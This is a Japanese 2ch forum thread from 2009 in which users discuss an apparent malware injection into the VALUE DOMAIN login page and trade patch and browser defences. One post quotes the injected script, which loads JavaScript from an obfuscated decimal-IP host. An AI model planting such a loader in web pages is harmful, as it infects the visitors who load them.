VALUE DOMAINってどう ..
[2ch|▼Menu]
360:名無しさん@お腹いっぱい。
09/07/08 00:34:01 0
>>358
それはともかくlogin.phpにリクエストを出して戻ってきたコードに埋め込まれていたのは確か

361:名無しさん@お腹いっぱい。
09/07/08 00:48:06 0
今でもその改竄された時点での魚拓とかある?

362:名無しさん@お腹いっぱい。
09/07/08 00:49:37 0
>>361
>>92がまだ見られるんじゃないかな

363:名無しさん@お腹いっぱい。
09/07/08 00:49:53 0
改竄事件は、他社工作員の捏造。。気にする必要なし。
デジロのセキュリティは万全。

364:名無しさん@お腹いっぱい。
09/07/08 00:50:55 0
>>363
今日は遅出勤務なの?
何時まで?

365:名無しさん@お腹いっぱい。
09/07/08 01:02:01 0
いまだ何もアナウンスがないなんて企業としてどうかしてる。

366:名無しさん@お腹いっぱい。
09/07/08 01:03:21 0
>>354のサポートページ自体はソースに
>>31-32の変数コードなかったけど
ログインしてみないと、その先は分からないからな
フォーラムもトップは大丈夫だけど
ログインしてみないと分からない

>>362  
魚拓はコード残ってるから開かないほうがいい

367:名無しさん@お腹いっぱい。
09/07/08 01:03:30 0
何もなかったから、アナウンスなど無くて当然。
これは、捏造事件です。


368:名無しさん@お腹いっぱい。
09/07/08 01:08:11 0
>>367
隠蔽する気マンマンだなぁ

369:名無しさん@お腹いっぱい。
09/07/08 01:10:04 0
公的ぽいところに届出が無い限り、
がせだと思って良いかな?
URLリンク(www.ipa.go.jp)

370:名無しさん@お腹いっぱい。
09/07/08 01:11:38 0
釣りにマジレスするのもなんだけど
ガセだ捏造だと主張する人は
魚拓もグルだと言うつもりなんだろうか

371:名無しさん@お腹いっぱい。
09/07/08 01:12:48 0
土下座しろとかは言わない もともと、ここはプロかハイアマが使うんだから、
淡々と、しかし正確に事実関係とか告知すれば足ると思うし、かつ必要だと思うんだ

372:名無しさん@お腹いっぱい。
09/07/08 01:16:17 0
>>370
釣りにマジレスすんなよ、と言わせていただこう

373:名無しさん@お腹いっぱい。
09/07/08 01:18:50 0
スラッシュドットジャパンでよければ
URLリンク(slashdot.jp)

374:名無しさん@お腹いっぱい。
09/07/08 01:20:17 0
>>360
それはともかく て。違いが分からないの?

375:名無しさん@お腹いっぱい。
09/07/08 01:33:00 0
徐々にニュースサイト系に情報広がってるね
これがVD流の七夕祭りですか

376:名無しさん@お腹いっぱい。
09/07/08 01:35:33 0
>>369
脆弱性有無の調査方法
DNSキャッシュポイズニングの脆弱性の有無を確認
URLリンク(www.ipa.go.jp)

* porttest.dns-oarc.net -- Check your resolver's source port behavior
* URLリンク(www.dns-oarc.net)

* txidtest.dns-oarc.net -- Check your resolver's transaction ID behavior
* URLリンク(www.dns-oarc.net)

* IANA ― Cross-Pollination Scan
* URLリンク(recursive.iana.org)

この3つで確認すればいいのかな?

377:名無しさん@お腹いっぱい。
09/07/08 01:42:17 0
さっさと仕事しないとGENOウィルスみたいにウィルスの名前になるとかすっげえ不名誉なことになる悪寒

378:名無しさん@お腹いっぱい。
09/07/08 01:43:34 0
コードは確かに書き加えられてたよ。
ここに貼られてたソースもハッキリ見た。

昨夜9時頃ログインしたが今のところ何ともない。
今後どうなるかはわからんが...
明日俺のサイト書き換えられてたりして...orz

379:名無しさん@お腹いっぱい。
09/07/08 01:43:58 0
「VDウイルス」
「デジロウイルス」

悪くないな

380:名無しさん@お腹いっぱい。
09/07/08 01:58:29 0
コードが書き換えられていたのなら、

それを修正対応処理した時点でデジロが何かアナウンスして当然でしょ。
アナウンスが無いのはコード書き換えなど無かったからです。
他社工作員の捏造にだまされないように、

381:名無しさん@お腹いっぱい。
09/07/08 02:00:36 0
>>376は全然ちがったみたい
>>369見る前はこれかと思ったんだけど

でも、ログインは関係ないのか?
もしかして、ServerとClientは
別物と何度言ったら(nyってやつ?

382:名無しさん@お腹いっぱい。
09/07/08 02:06:45 O
>>380

ノシ >>286

383:名無しさん@お腹いっぱい。
09/07/08 02:08:33 0
>>286の読み方がわからない

384:名無しさん@お腹いっぱい。
09/07/08 02:12:13 0
隠蔽しようと頑張ってるとしか思えんわ

385:名無しさん@お腹いっぱい。
09/07/08 02:48:42 0
なんだかすごいことになったみたいだね
よりによって久々にDNSいじるためにおととい昨日今日とログインしたというのに…
firefoxだけど大丈夫なのかしら

386:名無しさん@お腹いっぱい。
09/07/08 02:52:26 0
>>340
まあそういう穴もあるんだがGeno系は違う場合もあるからねえ
今回もアプリよりFTPとかそっちを疑ったほうがいいのかもしれない
Genoのときもそうだったけど被害サイトが特定のCMSや
Webサーバじゃなかったんで最初混乱した

データを抜いたんじゃなくてPHP書き換えちゃってるんだしね
こういう流れも考えられるよってかんじで参考程度だけど
中の人のPCがGeno系に感染→FTPパスとられる→サーバ側改ざん(新型うめこみ)

387:名無しさん@お腹いっぱい。
09/07/08 02:52:41 0
>>385
ログイン処理の部分で書き換えられていたならばアウト
報告が無いのでどこまで書き換えられたかは判らないが。

388:名無しさん@お腹いっぱい。
09/07/08 02:53:34 0
>>385
FirefoxであればAdobe製品を最新にしていれば
クライアント側は大丈夫かもしれない

389:名無しさん@お腹いっぱい。
09/07/08 02:57:00 0
>>387
そうなのか…ありがとう
JSは大丈夫だったとしてもログイン処理のほうが問題だよね
こればっかりはどうしようもないから報告待ちするしかないなぁ…

390:名無しさん@お腹いっぱい。
09/07/08 02:59:20 0
>>388
GENOの件でReaderとFlashPlayerは最新のはずだからそこは大丈夫そう
教えてくれてありがとう

391:名無しさん@お腹いっぱい。
09/07/08 03:13:24 0
去年改ざんされた広告サーバのIPアドレスを逆引きすると、sakura1.digi-rock.com。
今回改竄されたVDのサーバが、sakura2.digi-rock.com。
また、さくらインターネットに置いているサーバだな。

392:名無しさん@お腹いっぱい。
09/07/08 03:33:50 0
>>388
いや、Adobe製品・・・というか全てのリッチコンテンツ用プラグインを削除しないと安心は出来ないだろ。どうせまだ穴があるに決まってる。
HTML/JavaScriptパーサバグは流石にもうIEくらいしか食らわないだろうけど、プラグインは枯れるどころか不安定機能が絶賛増加中なわけで


393:名無しさん@お腹いっぱい。
09/07/08 03:39:37 0
('A`)アアアァァァァァァァァァァァ....
.
三年寝太郎の俺が
久しぶりに土曜日からずっとアレコレやってたらこの騒ぎ。。。

流し読みだけど↓で合ってる?


 login.phpが書き換えられた。
 
 @ 変なJavaScriptが埋め込まれてる。
    → 変なActiveXが実行される。
     → IEの人は要注意。(魚拓も危険)
      → ともかく全員これを当てておけ。 URLリンク(support.microsoft.com)
 
 A login.phpが書き換えられたって事は…
    → ログイン危険。
    → というか、何もかもやばいだろ\(^o^)/


394:名無しさん@お腹いっぱい。
09/07/08 03:43:12 0
>>392
そんなあなたにFirefox+NoScript(フレーム禁止も設定で追加)

395:名無しさん@お腹いっぱい。
09/07/08 03:47:41 0
>>394
既にOperaの標準機能でプラグイン停止して運用してる
外部拡張に頼らず本体機能だけでプラグインのON/OFFを切り替えられるから、そういう意味ではかなり便利

396:名無しさん@お腹いっぱい。
09/07/08 03:49:43 0
>>394
ドメイン毎に設定できるのが魅力だけど
許可サイトに加えていくなど、ある程度熟練した人向けだと思う
しっかり設定しないと、動画も表示されないからね

397:名無しさん@お腹いっぱい。
09/07/08 03:50:45 0
>>393
変なActiveXだけじゃなく変なPDFと変なSWFもあったみたいだよ
どれかにヒットすれば感染おめでとう

サーバ側についてはGenoと同じでなかったことにしようとしてるみたいだね
価格.comの改悪型Genoメソッドだ

他の攻撃サイトでもIEをターゲットにしているものは多いし
IEをメインブラウザとして使うのは危ないね

398:名無しさん@お腹いっぱい。
09/07/08 03:59:23 0
             /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ消せばいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /


399:動揺激しい、さくらスレに誤爆したw
09/07/08 04:10:16 0
thx、何でGENOの話をしてるのか分かってなかった。
pdf,swfもあったのね。


 login.phpが書き換えられた。
 
 @ 変なJavaScriptが埋め込まれてる。
    → 変なActiveXが実行される。
     → IEの人は要注意。(魚拓も危険)
      → ともかく全員これを当てておけ。 URLリンク(support.microsoft.com)

    → 変な pdf と swf を読まされる。
     → 例のGENO系。既に最新のAdobeReaderとFlashPlayerになってるよな!?
      → Adobe製品は自動更新間隔の期間が長いので、常に自分で最新を当てにいけ。
 
 A login.phpが書き換えられたって事は…
    → ログイン危険。
    → というか、何もかもやばいだろ\(^o^)/

400:名無しさん@お腹いっぱい。
09/07/08 04:14:03 0
>>396
そうなんだよね
わけわかめな人についてはNoScriptは入れないほうが良いとおもう

ただ、IEが一番狙われてるのは確実だからNoScriptなしでも
Firefox(その他のブラウザ含む)のがマシと考えられる
Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
IE8にもそういう機能がついてるけど踏まないと報告できないようなので
少なくとも一回罠にかからなきゃいけないんだよね・・・
それとも見落としていただけで報告サイトあるんだろうか

どっちみち今回のような未知のドメインには対応してないので基本的な対策は必要だけどね

ただ、Firefoxが良いから使えっていうポジティブな理由じゃなく
IEが危なすぎるからやめろっていうネガティブな理由なんで他ブラウザでも構わない
Google Chromeはたとえブラウザの脆弱性があったとしても
サンドボックス化されていて実行する権限が無いので動かないみたいな話だったかな

401:名無しさん@お腹いっぱい。
09/07/08 04:18:55 0
このあたりに今回の件が書いてある
URLリンク(ilion.blog47.fc2.com)
URLリンク(www.st.ryukoku.ac.jp)
URLリンク(lineage.paix.jp)

402:名無しさん@お腹いっぱい。
09/07/08 04:19:26 0
>>399
ここの人は大丈夫だと思うけど、念のためGeno関連補足
AdobeReaderに関しては今後また狙われそうなJavaScript機能のオフ推奨
また、Reader自体使用していないならアンインストールしたほうが無難
メーカー製PCの場合は勝手に入ってることが多いので使用していなくても
インストールされていないか要確認

403:名無しさん@お腹いっぱい。
09/07/08 04:39:35 0
これってreader入れてなければflashプレイヤー入ってても感染しないの?

404:名無しさん@お腹いっぱい。
09/07/08 04:40:40 0
>>399
これってブラウザのスクリプト切ってても感染するの?

405:名無しさん@お腹いっぱい。
09/07/08 04:42:23 0
>403
だから FlashPlayer は最新にしろとあれほど

406:名無しさん@お腹いっぱい。
09/07/08 05:11:23 0
要するにAdobe私ねってことだ

407:名無しさん@お腹いっぱい。
09/07/08 06:27:28 0
>>405
してるよ。
IE6
flashplayer最新
reader無し

408:名無しさん@お腹いっぱい。
09/07/08 06:52:32 0
URLリンク(support.microsoft.com)
をやってないならアウト

409:名無しさん@お腹いっぱい。
09/07/08 07:12:59 0
>>408
やってないみたいだけど感染してるかどうかってどこで見分けるの?
GENOウイルスはレジストリエディタが立ち上がらなくなるって聞いたけど立ち上がるし
アプリケーションが糞重くなるって聞いたけど特に変化無いし
PeerGurdian2で見てても特に変な動きしてないみたいなんだけど。

410:名無しさん@お腹いっぱい。
09/07/08 07:22:13 0
動画見ないからそもそもフラッシュのプラグイン入れてないなw

411:名無しさん@お腹いっぱい。
09/07/08 08:00:03 0
横になったら寝てた
>>400
>Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
寝る前に、そういうサイト踏んだら、そうなった
今IE7でやってみたら、危険なドメイン開いた
>>408やってなかったからか

412:名無しさん@お腹いっぱい。
09/07/08 08:11:37 0
>>409
バックドアかキーロガーだから見つかりにくいように作ってるだろう。
regeditが起動しないみたいなあからさまな挙動はない。
私は感染してないので、がんばって見分け方を見つけてね。

413:名無しさん@お腹いっぱい。
09/07/08 08:24:11 0
見分け方は、sqlsodbc.chmのファイルサイズの確認でしょう
>>411はただのエロサイトだった
それを今回のアドレスでやればいいのかな

414:名無しさん@お腹いっぱい。
09/07/08 09:15:22 0
うっかり砂箱の中で>>408やったらループった
試すアドレスは >>286のでいいのか
FireFox、Chromeはブロックしてくれたけど
IEが接続できなきないだけで、もう一つ分からない
IE8にしないと駄目か



415:名無しさん@お腹いっぱい。
09/07/08 10:01:07 0
IE8にしてみたけどInternet Explorer ではこのページは表示できません
って出るから、これだとブロックしてくれてるのかどうか分からん
うちのモデムの接続もともと不具合だし

416:名無しさん@お腹いっぱい。
09/07/08 10:05:43 0
なんでここがさくらのサーバ使ってんのかと思ったら、
自前のだと良く落ちるからかな?

417:名無しさん@お腹いっぱい。
09/07/08 10:06:38 0
で、結局何?今回の騒動は釣りじゃないのか?

なんか最近思うんだが、ムームードメインとお名前が必死じゃないか?

おれはムームーでのcomドメイン管理を止めた。

使い勝手の悪いムームードメインから
デザインが悪くても管理の楽なバリュードメインにしたよ。
おれと同じようなユーザーは多数いるだろうね。

今回の件、ムームー社員が工作しているように見えるから不思議。

418:名無しさん@お腹いっぱい。
09/07/08 10:10:07 0
それより、お前らどこに引っ越したんだよ

419:名無しさん@お腹いっぱい。
09/07/08 10:10:41 0
■Slashdot.jp
VALUE DOMAIN のログイン ページ改ざん
URLリンク(slashdot.jp)

■リネージュ資料室
VALUE DOMAINログインページ改竄
URLリンク(lineage.paix.jp)

■セキュリティホールMEMO
バリュードメインでこの欠陥を利用した攻撃が発生
URLリンク(www.st.ryukoku.ac.jp)

420:名無しさん@お腹いっぱい。
09/07/08 10:14:45 0
早く公表してくれ


5000人以上の個人情報を保有しているだろうから法的に裁かれるぞ


今回の件ばかりは隠すことは出来ない


下手すれば・・・

421:名無しさん@お腹いっぱい。
09/07/08 10:16:01 0
ゴクリ...

422:名無しさん@お腹いっぱい。
09/07/08 10:28:29 0
釣られないぞ・・・

423:名無しさん@お腹いっぱい。
09/07/08 10:34:25 0
問題が発生した時点でのウイルス検体を拾った人が大勢いる
あとになればなるほど、返答に窮するようになるかもしれないのに、何をやってるんだ

zxshell晒しsage

424:名無しさん@お腹いっぱい。
09/07/08 10:35:55 0
おっと早漏

△ウイルス検体を拾った人
○ウイルス検体を(騒動を察知してわざわざ)拾いにいった人

425:名無しさん@お腹いっぱい。
09/07/08 10:53:53 0
中国か、GMOに身売りになったらイヤだな

426:名無しさん@お腹いっぱい。
09/07/08 11:06:16 O
デジロウイルスのアナウスまだぁ?

427:名無しさん@お腹いっぱい。
09/07/08 11:35:27 0
対策してて大丈夫な人、ここ見ても平気か試してくれよ
URLリンク(dnf.wikiwiki.jp)

428:名無しさん@お腹いっぱい。
09/07/08 12:01:22 0
URLリンク(so.7walker.net)
上のソースで問題の部分は./er/pr.phpだよね

429:名無しさん@お腹いっぱい。
09/07/08 12:03:55 0
どうしちゃったんだよVALUEDOMAIN…

430:名無しさん@お腹いっぱい。
09/07/08 12:07:38 0
>>428はURL間違ってね?

431:名無しさん@お腹いっぱい。
09/07/08 12:22:32 0
デジロックは公式アナウンスをしない気か?
GIGAZINEとか他のニュースサイトでも取り上げてくれれば、
ニュー速とかにスレが立って、デジロも無視できない状態になるだろうに・・・。

あー、乗り換えるのめんどうだし、デジロックには頑張ってほしいよ。

432:名無しさん@お腹いっぱい。
09/07/08 12:26:31 0
公式アナウンスしないっていうより、できないのかも
何が起こったのか把握できる技術者が外注にもいないんだよ、きっと

433:名無しさん@お腹いっぱい。
09/07/08 12:29:40 0
デジロが無視できない状態にしたいのであれば、
国に動いてもらえばよかろう

434:名無しさん@お腹いっぱい。
09/07/08 12:41:50 0
国に動いてもらいたいなら正式に通報しろよ
誰もやってないんだろ

435:名無しさん@お腹いっぱい。
09/07/08 12:44:57 0
>>430
>URL間違ってね?
って、そういう意味か
>>427のソースはこっち
view-source:URLリンク(dnf.wikiwiki.jp)
>>428で問題だったインラインフレームタグって
./er/pr.phpだろう?
まったく同じのはなかったけど
それで安全ってことでいいのか?
こっちはiframeどころかHTMLも碌に
知らないんだから分かる人よろしく
直踏みの感想は特に問題なかったけど
当方の環境で問題なしとしか言えない

436:名無しさん@お腹いっぱい。
09/07/08 12:47:22 0
>>434
誰もやってないだろうね
ここのユーザーは、基本的に法の知識も低い傾向があるしな

437:名無しさん@お腹いっぱい。
09/07/08 12:51:27 0
>>436
お前とかな

438:名無しさん@お腹いっぱい。
09/07/08 12:54:07 0
お子様が紛れ込んでいるようです。

439:名無しさん@お腹いっぱい。
09/07/08 12:54:28 0
法の知識が低いとなんかまずいのかね?
頭でっかちの知識自慢は嫌われますよ〜

440:名無しさん@お腹いっぱい。
09/07/08 12:56:55 P
>>436
ググレカスの人ですか?

441:名無しさん@お腹いっぱい。
09/07/08 13:00:04 0
んで今はどんな状況よ

FTP侵入

サイト改竄

ウイルス埋め込み

だけならいいが、
FTPに入られてDBに接続するプログラムを見て、
DBの顧客情報をもってかれていたら終了だろ

442:名無しさん@お腹いっぱい。
09/07/08 13:03:45 0
関係あるかな?

韓国で大規模サイバー攻撃、大統領府など被害
URLリンク(www.nikkei.co.jp)

443:名無しさん@お腹いっぱい。
09/07/08 13:04:07 0
アナウンスないと、突っ込んだ話は正直わからないよねぇ

444:名無しさん@お腹いっぱい。
09/07/08 13:05:49 0
>>440
>>141で規約に謳ってあると言われて
いなくなっちゃったよ
ソース>>142

445:名無しさん@お腹いっぱい。
09/07/08 13:19:02 0
規約の「責任の限界」の内容って、「無責任」とどう違うのかだれか教えて

446:名無しさん@お腹いっぱい。
09/07/08 13:42:26 0
>>445
責任と取るべく努力はするが、ダメだったら許してね
ってことだが、実態は無責任に近いなw

さすがにサーバー落ちたとかそういうレベルじゃなく、資産が他人に盗まれる
可能性を含んだ問題だからなぁ、fc2かgodaddyにでも移動するか・・・

447:名無しさん@お腹いっぱい。
09/07/08 13:47:29 0
ネームサーバ障害の徹底放置しかり、この状況下で移管は止めんが移管先の話は
該当スレでどうぞ。

デジロ社員といつもの頭おかしい子の「他社工作員乙」ってワードの呼び水になるん
でそういう話は該当スレで頼む。

448:名無しさん@お腹いっぱい。
09/07/08 13:49:52 0
レンタルアクセス解析サービス 謎のあやしい文字 & う ・・・
いまは、でない。気のせいだったのか・・・ 気のせいだったんだろうなぁ
でも、どこででたんだろう・・・ いまいち記憶が・・・

449:名無しさん@お腹いっぱい。
09/07/08 13:56:22 0
今のとこ実害報告ないけど、実際に実害報告出だしたらどう命名されるんだろ

DigiRoウイルス

かなぁ?

450:名無しさん@お腹いっぱい。
09/07/08 13:59:25 0
大阪ウィルスだろww

451:名無しさん@お腹いっぱい。
09/07/08 14:03:15 0
移管しようにも怖くてログインすらできんのだが…
ある程度の安全が確保されてから全移管する

452:名無しさん@お腹いっぱい。
09/07/08 14:19:20 0
>>451
全部一気に移管するならログインしても問題ないだろ
終わってしまえばもう関係ないんだからさ

453:名無しさん@お腹いっぱい。
09/07/08 14:35:39 0
俺も怖くてログインできないクチなんだよな…
入金したから、その申請をしたかったんだが…

正式なアナウンスしないつもりなのかな?

454:名無しさん@お腹いっぱい。
09/07/08 14:42:42 0
ある程度まとまった数のユーザーに実際の被害が出なけりゃこのまま黙殺だろ

被害が出たらそりゃ凄い事になりそうだけどなw

455:名無しさん@お腹いっぱい。
09/07/08 14:43:05 0
ソースは2ちゃんとか走りすぎじゃない?
何処も自身で確認した訳でもなく、そーすは2ちゃんって言ってるじゃん
しかも個人ブログとかどう信用しろっていうんだ

>>451
俺ログインしまくってるけど特になにもないよ

456:名無しさん@お腹いっぱい。
09/07/08 14:45:43 0
何か言う前に同一スレ内くらいざっと読めよ

457:名無しさん@お腹いっぱい。
09/07/08 14:46:10 0
仮に改竄時にパスを抜かれてたとしてだ、
現時点でコード削除されていて、再発していないということは、デジロ側で抜かれたパス変更してるはず。
なんで待ってないでさっさとログインしてパス変えちゃえば心配ないと考える。
むしろ何かされるの待ってる方がマゾ。

458:名無しさん@お腹いっぱい。
09/07/08 14:49:38 0
>>456
スレ全部読んだけど、上でも誰かいってたけど原爆ネタと同じ流れじゃん
魚拓も含めて。

459:名無しさん@お腹いっぱい。
09/07/08 14:50:18 0
前にxreaで運営しているネトゲサイトだかなんだかにスクリプト埋め込まれたのも同じ方法じゃないか?

あんときは http://1039045744:88/jp.js だったけど

xreaはこんときスクリプトの脆弱性をついたXSSって発表してるから今回もそうかね?
だとしたら間抜け以外の何モンでもないな

URLリンク(sb.xrea.com)

460:名無しさん@お腹いっぱい。
09/07/08 14:51:01 0
ミスリードにも程がある

461:名無しさん@お腹いっぱい。
09/07/08 14:52:00 0
コンタクトフォームで聞いたが、

--------------------------------------------------------------------
お世話になっております。

お問い合わせについてですが、先ほど問題無くログイン可能でございました。

セキュリティソフトなどの警告も無く、現状ではユーザー様から連絡いただいた症状を確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。
---------------------------------------------------------------------

「現状ではユーザー様から連絡いただいた症状を確認できませんでした。」
と言う言葉を信じるなら、ガゼじゃないのか?
妬みを持つユーザーから

462:名無しさん@お腹いっぱい。
09/07/08 14:54:48 0
godaddyは以前クラックされてたよな。
FC2は安いしVDに近い操作ができそうだが、実際どうなのかな

463:名無しさん@お腹いっぱい。
09/07/08 14:58:21 0
こんな時に何だけど、ネームサーバ障害はやっぱり完全放置なんだよね?

464:460
09/07/08 15:01:29 0
サポートに質問してみたら速攻レスきて驚いた・・・

[2009-07-08 14:51:02] サポートからメッセージが追加されました。

お世話になっております。

お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。

2ちゃんを信じるか公式のコメントを信じる最終的には個々の判断だけど
もし事実じゃないとしたら、いくら2ちゃんねるだからといって悪質にも程があると思う。
ミスリードに釣られて煽った人間も同罪。

465:名無しさん@お腹いっぱい。
09/07/08 15:02:35 0
魚拓はどうなの
怖くてみれない

466:名無しさん@お腹いっぱい。
09/07/08 15:04:54 0
>>465
スレの内容どおりだよ、マルウェアが仕込まれたjsファイルへのリンクが埋め込まれてる
ブラウザのjavascriptを切った状態でアクセスしてソースを確認すればいい

467:名無しさん@お腹いっぱい。
09/07/08 15:08:26 0
やはり、改竄はなかった。サポートが正式回答しているではないか。
他社工作員乙。捏造するにも程がある。いい加減にしろ。

468:名無しさん@お腹いっぱい。
09/07/08 15:13:06 0
firefox+Noscriptで魚拓見てきたけど
たしかにあったねs.jsっていうの
この魚拓URL見せたらなんて言うんだろう?

469:名無しさん@お腹いっぱい。
09/07/08 15:14:02 0
ソースのログインフォームの下あたりだよね

470:名無しさん@お腹いっぱい。
09/07/08 15:16:09 0
魚拓が捏造でしょ
デジロが正式アナウンスしない限り、他社工作員の捏造

471:名無しさん@お腹いっぱい。
09/07/08 15:19:40 0
改ざんされて被害にあったっていってたひとがふしあなで書き込むといいんじゃない?

472:名無しさん@お腹いっぱい。
09/07/08 15:20:31 0
捏造って流れで押そう! ってのがトレンドなんだw

473:名無しさん@お腹いっぱい。
09/07/08 15:21:27 0
ホメ殺しでしょ、極端なデジロ擁護で逆に反感を煽ってるんだよ

474:名無しさん@お腹いっぱい。
09/07/08 15:23:52 0
ははww
前スレ終盤あたりからだよねその流れww

475:名無しさん@お腹いっぱい。
09/07/08 15:23:53 0
極端なデジロ擁護っていうのがよくわからない

476:名無しさん@お腹いっぱい。
09/07/08 15:23:58 0
魚拓が捏造可能って話にしちゃうとそれはそれですごい面倒な話になる気がする

477:名無しさん@お腹いっぱい。
09/07/08 15:27:07 0
社員乙っていわれるようにレスしてんじゃないの
原爆の時みんなにスルーされてたやつじゃない?

478:名無しさん@お腹いっぱい。
09/07/08 15:27:35 0
魚拓がねつ造可能だと通報しろ。そっちの方が世間的には盛り上がるぞw

479:名無しさん@お腹いっぱい。
09/07/08 15:28:59 P
>>462
FC2は複数のドメイン管理で切り替えが必要な時点でクソ。
個人的にはムームーの方がよっぽど使いやすいレベル。


480:名無しさん@お腹いっぱい。
09/07/08 15:29:19 P
おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
サポートにその申し送りがされてないとしか考えられない。

とことん「改竄がなかった」ことにしたい輩がいるけれど、
俺から見れば、むしろそうやってうやむやにしたい奴のほうが悪質に見える。

>>473
その可能性はあるね。頭がおかしいとしか言いようがない。

481:名無しさん@お腹いっぱい。
09/07/08 15:33:49 0
自分で確認できなかった事と事実をなかったことにしろっていうのは違うだろ。
公式がないって言ってんのを名無しを信じろっていうほうが無理だろ

482:名無しさん@お腹いっぱい。
09/07/08 15:34:15 0
なかったことにしたい人が必死すぎてこわい

483:名無しさん@お腹いっぱい。
09/07/08 15:34:58 0
俺から見れば名無しで書き込んで、信じろっていうやつのほうが頭おかしいと思うが

484:名無しさん@お腹いっぱい。
09/07/08 15:35:42 0
>>480
お金を取って、ログまで残して回答してるのと、
2chのどっちを信るかろと言えば、前者だろ。

ちょっと考えれば、value-domainってlocalアドレスを
自分のPCで書き換えれば、URI付き魚拓なんて捏造いくらでもできるからな。

絶対ガセ

485:名無しさん@お腹いっぱい。
09/07/08 15:35:51 0
>>482
頭大丈夫?

486:名無しさん@お腹いっぱい。
09/07/08 15:36:06 0
名無しの問題じゃなくて、魚拓の信頼性だろ

487:名無しさん@お腹いっぱい。
09/07/08 15:36:48 0
どうせわざとやってんだから相手にすんなよ

488:名無しさん@お腹いっぱい。
09/07/08 15:38:47 P
>>481
そんなこと言うなら、
「公式がないって言ってる」という情報源だって名無しだろうが

489:名無しさん@お腹いっぱい。
09/07/08 15:40:23 0
急にP付で書き込んでてフイタw
恥を知れw

490:名無しさん@お腹いっぱい。
09/07/08 15:42:04 0
>>484
それ自分はだませるけど魚拓側のリゾルバはだませないだろ?

491:名無しさん@お腹いっぱい。
09/07/08 15:43:50 0
ガセを流した方々へ

コンタクトフォームで問い合わせしてるやしまで現れて、
デジロックは無駄な労力使ってる。

そろそろ許してやれよなーー

492:名無しさん@お腹いっぱい。
09/07/08 15:44:45 0
ActiveX…恐ろしい子っ!

493:名無しさん@お腹いっぱい。
09/07/08 15:44:54 0
>>490
localhost value-domain.com

でいいんでない?

494:名無しさん@お腹いっぱい。
09/07/08 15:45:39 P
>>481
まあいいや。
君が善意の第三者と仮定するなら、君の言い分も分からないではない。
ただソースをこの目で確認した俺からすれば、隠蔽工作をしているデジロックに
対して心底腹が立つ。

てか俺、完璧釣られてるのかな。

495:名無しさん@お腹いっぱい。
09/07/08 15:46:24 0
>>493
魚拓のコンテンツ取得って魚拓のサーバーがやってるんだから
ローカルのホスト情報関係ないと思ったんだけどそういう仕組みじゃないんだっけ?


496:名無しさん@お腹いっぱい。
09/07/08 15:46:29 0
>>493
魚拓サイトのサーバにそれをどうやって書き込むの?
自分のPCだけだよそれで騙せるのは

497:名無しさん@お腹いっぱい。
09/07/08 15:48:00 0
魚拓というアーカイバーか。なるほど。

498:名無しさん@お腹いっぱい。
09/07/08 15:48:17 0
被害にあったっていうならふしあなで書き込めばいいんじゃない?
そうすれば擁護の連中も信じるかもよ?

>おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
>で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
>仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
>サポートにその申し送りがされてないとしか考えられない。

499:名無しさん@お腹いっぱい。
09/07/08 15:48:27 0
>>494
ええ、釣られてると思いますよ

500:名無しさん@お腹いっぱい。
09/07/08 15:49:08 0
>>494
ヒント:現在勤務時間中

501:名無しさん@お腹いっぱい。
09/07/08 15:50:05 0
ID出れば社員がわかって便利なのに不便だな

502:名無しさん@お腹いっぱい。
09/07/08 15:52:13 0
お待ちかねの社員乙のタイミングですねw
わざわざご苦労さま

503:名無しさん@お腹いっぱい。
09/07/08 15:53:08 0
ガセ情報を流しているのは社員の方ですね

504:名無しさん@お腹いっぱい。
09/07/08 15:53:16 P
>>499-500
だよねぇ・・・。

>>498
べつにやってもいいけど、何の根拠にもならんだろ。
相手が善意の第三者でないなら尚更のこと。

505:名無しさん@お腹いっぱい。
09/07/08 15:55:31 0
意味がわからない・・・

506:名無しさん@お腹いっぱい。
09/07/08 15:57:04 P
いっそまちBBSとか、全員強制IPのところでやれば面白い。

507:名無しさん@お腹いっぱい。
09/07/08 15:57:37 O
まぁ、そのうちにドメイン乗っ取りが開始されれば、少しはここも静かになるわな。

508:名無しさん@お腹いっぱい。
09/07/08 15:57:52 0
WEB魚拓の中の人に連絡してみる
どっちかが捏造してるんだろ?それは罪を問われるべき

509:508
09/07/08 16:00:36 0
デジロの捏造だとしたら救いようない問題だし
WEB魚拓経由で捏造してウィルス撒いてるとしても問題
これは白黒つけるべき

510:名無しさん@お腹いっぱい。
09/07/08 16:01:34 0
ややこしくなるからお前もうでてくんなよ

511:名無しさん@お腹いっぱい。
09/07/08 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー URLリンク(ax.xrea.com)
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?



512:名無しさん@お腹いっぱい。
09/07/08 16:03:09 0
>>511
ある! 同じjsが

513:名無しさん@お腹いっぱい。
09/07/08 16:04:14 0
うわ!マジで居る
見に行くならスクリプト切っていけよ

514:名無しさん@お腹いっぱい。
09/07/08 16:04:42 0
>>511

</head>タグのちょうどうえ

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement('script');
js.src ="http://1856317799:888/jp.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>
</HEAD>


515:511
09/07/08 16:06:11 P
どうも。アバスト反応して、入る前にすぐ削除したけどびっくりしたわ。>>511
昨日の昼ぐらいまでは、こんなん反応しなかったハズ。

516:511
09/07/08 16:08:03 P
